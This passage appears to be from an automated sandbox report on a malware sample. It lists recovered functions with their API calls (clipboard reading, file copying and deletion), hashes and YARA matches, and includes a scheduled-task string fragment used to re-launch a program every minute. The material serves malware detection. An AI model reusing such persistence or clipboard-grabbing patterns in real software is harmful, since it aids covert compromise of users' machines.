                                                                                                                                                                                          • Source File: 0000000E.00000002.609959614.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen$AllocFreeGlobalLocal
                                                                                                                                                                                          • String ID: /C /create /F /sc minute /mo 1 /tn "
                                                                                                                                                                                          • API String ID: 3873415381-4285889591
                                                                                                                                                                                          • Opcode ID: 130ea67c3727dbfe4e8bb06d54dfa35f071c00b44640929ded855d708f63130a
                                                                                                                                                                                          • Instruction ID: 0e2accd316f0740cf4790ddd6ead8351873a64eea53320718b967e6aeada0125
                                                                                                                                                                                          • Opcode Fuzzy Hash: 130ea67c3727dbfe4e8bb06d54dfa35f071c00b44640929ded855d708f63130a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3501B575600200EFD7205FA9DC89A6ABAFAEFC8312F18043DA286E3361D7B14941DA51
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02C61D8B, Relevance: 7.5, APIs: 5, Instructions: 24clipboardCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 02C61D8F
                                                                                                                                                                                          • GetClipboardData.USER32(0000000D), ref: 02C61D9C
                                                                                                                                                                                          • GlobalFix.KERNEL32(00000000), ref: 02C61DA9
                                                                                                                                                                                          • GlobalUnWire.KERNEL32(00000000), ref: 02C61DB6
                                                                                                                                                                                          • CloseClipboard.USER32 ref: 02C61DBC
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609959614.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Clipboard$Global$CloseDataOpenWire
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1198520892-0
                                                                                                                                                                                          • Opcode ID: 3c49645208ac729d989d0f948fee9bd6a50bf7ba83a65ea476ea956c222f9c8c
                                                                                                                                                                                          • Instruction ID: 7b2c4b9573123fbccf7064afa3b12f5066a46d4c37b8a204b6c6bbf2f1f61c3c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c49645208ac729d989d0f948fee9bd6a50bf7ba83a65ea476ea956c222f9c8c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 96E086B610152197C2222764BD4CB6FAE78AFC1A5270A0139FF05F2211DB74C90185B4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00419480, Relevance: 7.5, APIs: 5, Instructions: 24filelibraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041948F
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00421DC8), ref: 0041949A
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(00000000), ref: 004194A2
                                                                                                                                                                                          • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004194AA
                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 004194B4
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalDeleteEnterEnvironmentErrorFileFreeLastLibraryLoadSectionStrings
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2355528868-0
                                                                                                                                                                                          • Opcode ID: 9f7c975e490926aebf48e2bf078307ce9ea013025e012bc18f92bbb9d763b40d
                                                                                                                                                                                          • Instruction ID: be5c53dd517337924b076f4d2e36b75196b0ade31bde952fcd212899ea8bb193
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f7c975e490926aebf48e2bf078307ce9ea013025e012bc18f92bbb9d763b40d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1FF08C35945208DFC701EFA0E85DA9A7F74FB0D302F008661EA5587251CB301965CBEA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00407250, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                                                                          • String ID: 9
                                                                                                                                                                                          • API String ID: 3120068967-2366072709
                                                                                                                                                                                          • Opcode ID: 0ea6146af0f2c26e6f89072181573e13106b90481fae994fd2cb8fba2cd0ab83
                                                                                                                                                                                          • Instruction ID: 7e99398a2989f63ab91d86e5d1f340e94c6fbd712eeb2fe5690cc7a552c25abe
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ea6146af0f2c26e6f89072181573e13106b90481fae994fd2cb8fba2cd0ab83
                                                                                                                                                                                          • Instruction Fuzzy Hash: 104118B1E041299FDB24CF58C941BAEB7B5FF85314F1080AAD548B7281D3786E85CF5A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040729E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                                                                          • String ID: 9
                                                                                                                                                                                          • API String ID: 3120068967-2366072709
                                                                                                                                                                                          • Opcode ID: f22af67319abfc7469830822f47527434b550f8be6a7b99d64984b1ad6fb31c5
                                                                                                                                                                                          • Instruction ID: be5f340bf6e2c4c7509da247219f0037cb9acdb6af063adddbb9452891412781
                                                                                                                                                                                          • Opcode Fuzzy Hash: f22af67319abfc7469830822f47527434b550f8be6a7b99d64984b1ad6fb31c5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 454128B1E045299FDB24CF48C981BAEB7B5FF85314F0080A9D648B7281D7786E81CF1A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00410BD6, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                                                                          • String ID: 9
                                                                                                                                                                                          • API String ID: 3120068967-2366072709
                                                                                                                                                                                          • Opcode ID: d4d663e6eebe0b419f8463e3a84be00d961852047bb7cb56f8a1413bb460c924
                                                                                                                                                                                          • Instruction ID: 04074a4d55adec1fb7484b132e08c3b3bdfbdf4c825e8fe88e8a3d54cb31c223
                                                                                                                                                                                          • Opcode Fuzzy Hash: d4d663e6eebe0b419f8463e3a84be00d961852047bb7cb56f8a1413bb460c924
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E41C4B1905628DFEB24CF99D889BEEB7B5FB44304F20859AD009A7240D778AAC1CF44
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00407247, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _get_int64_arg$__aulldiv__aullrem
                                                                                                                                                                                          • String ID: 9
                                                                                                                                                                                          • API String ID: 2124759748-2366072709
                                                                                                                                                                                          • Opcode ID: 15e2ea9ed52891bb6a2a2a550db8cc62dd7b9df09e391ea8fb6298cdaec576cf
                                                                                                                                                                                          • Instruction ID: e2ad673a9e1fbcd92f3034303dd506abada369279c597e6f7b0f1569caf1cc2c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 15e2ea9ed52891bb6a2a2a550db8cc62dd7b9df09e391ea8fb6298cdaec576cf
                                                                                                                                                                                          • Instruction Fuzzy Hash: BE4109B1E045299FDB24CF58C941B9EB7B5FB85314F1080E9D648A7281D3786E81CF1A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00410B85, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _get_int64_arg$__aulldiv__aullrem
                                                                                                                                                                                          • String ID: 9
                                                                                                                                                                                          • API String ID: 2124759748-2366072709
                                                                                                                                                                                          • Opcode ID: abbb330f59fefbac0a25802ba133fbee9826849726f9bb39b00a427fd9cde486
                                                                                                                                                                                          • Instruction ID: 370d043033f9b44dbe123085fe21159393ba80c6a027f265584c43808d9c422b
                                                                                                                                                                                          • Opcode Fuzzy Hash: abbb330f59fefbac0a25802ba133fbee9826849726f9bb39b00a427fd9cde486
                                                                                                                                                                                          • Instruction Fuzzy Hash: A341B2B1905628DFEB24CF99D889BEEB7B5BB44304F20859AD409A7240D778AEC1CF45
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406009, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _write_multi_char$_write_string$__aulldiv__aullrem__mbtowc_l_get_int_arg
                                                                                                                                                                                          • String ID: 9
                                                                                                                                                                                          • API String ID: 830925916-2366072709
                                                                                                                                                                                          • Opcode ID: f4af19855defb4e8757c9dee4cc8f78e5cd9b80091bff6f9ff7b7f1be35c6121
                                                                                                                                                                                          • Instruction ID: 666b9c603c242c8d3fdac598ba9bfaf6b48c2fc0eb3efceb7bcde3098d1ea408
                                                                                                                                                                                          • Opcode Fuzzy Hash: f4af19855defb4e8757c9dee4cc8f78e5cd9b80091bff6f9ff7b7f1be35c6121
                                                                                                                                                                                          • Instruction Fuzzy Hash: F54114B0E405299FDB24CF58C981B9EB7B5BF85314F0081AAE24AA7241C7345E918F59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00417D18, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __getptd.LIBCMTD ref: 00417D2D
                                                                                                                                                                                            • Part of subcall function 004097C0: __getptd_noexit.LIBCMTD ref: 004097C6
                                                                                                                                                                                          • __getptd.LIBCMTD ref: 00417D3B
                                                                                                                                                                                          • ___DestructExceptionObject.LIBCMTD ref: 00417DA8
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __getptd$DestructExceptionObject__getptd_noexit
                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                          • API String ID: 4290476786-1018135373
                                                                                                                                                                                          • Opcode ID: e3c7c263da429b8e79a76c9b9e45ff382efde3c3abb58278cf50ca065713820e
                                                                                                                                                                                          • Instruction ID: c5ae066ec79feb25a95b830f48a347be30d413994d22970f6ff8f0c253586eec
                                                                                                                                                                                          • Opcode Fuzzy Hash: e3c7c263da429b8e79a76c9b9e45ff382efde3c3abb58278cf50ca065713820e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B11E675900208EBCF14DF65E4449EA7776AF54305F54806AE8095B342DB39DEC1CBE9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004198E5, Relevance: 6.1, APIs: 4, Instructions: 68fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CopyFileExW.KERNEL32(00421D80,00421D50,00000000,00000000,00000000,00000000,?,?), ref: 00419947
                                                                                                                                                                                          • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 0041994F
                                                                                                                                                                                          • FindNextFileA.KERNEL32(00000000,?), ref: 00419970
                                                                                                                                                                                          • GetStdHandle.KERNEL32(00000000), ref: 004199AD
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$AliasesConsoleCopyFindHandleLengthNext
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3298809309-0
                                                                                                                                                                                          • Opcode ID: ba3f90b7e07babbde7474793b10c1701f4891bdeaec7ef1c4b53b68aae505f26
                                                                                                                                                                                          • Instruction ID: dd6d673cba380057cd47230387bf578ec1fc145cf7a011dd64b80df19d897493
                                                                                                                                                                                          • Opcode Fuzzy Hash: ba3f90b7e07babbde7474793b10c1701f4891bdeaec7ef1c4b53b68aae505f26
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0021F5B4E00218EBDB14CF95CC55BEEBBB5FB48301F1081AAE519A7390D7746A84CF89
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004198F0, Relevance: 6.1, APIs: 4, Instructions: 61fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CopyFileExW.KERNEL32(00421D80,00421D50,00000000,00000000,00000000,00000000,?,?), ref: 00419947
                                                                                                                                                                                          • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 0041994F
                                                                                                                                                                                          • FindNextFileA.KERNEL32(00000000,?), ref: 00419970
                                                                                                                                                                                          • GetStdHandle.KERNEL32(00000000), ref: 004199AD
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000E.00000002.609445668.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$AliasesConsoleCopyFindHandleLengthNext
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3298809309-0
                                                                                                                                                                                          • Opcode ID: b7b150a1ff63d6d4aebb04a60a102bb373cb812755b12ff2cf7f8e49ef26d6d3
                                                                                                                                                                                          • Instruction ID: b61365670aa742c41b5a739128c8f99abb57d842f36a5c524496bbebd42e7819
                                                                                                                                                                                          • Opcode Fuzzy Hash: b7b150a1ff63d6d4aebb04a60a102bb373cb812755b12ff2cf7f8e49ef26d6d3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2621F8B4E00218EBDB14CF95DC55BEEBBB5FB48301F1081AAE519A7390D7746A84CF89
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%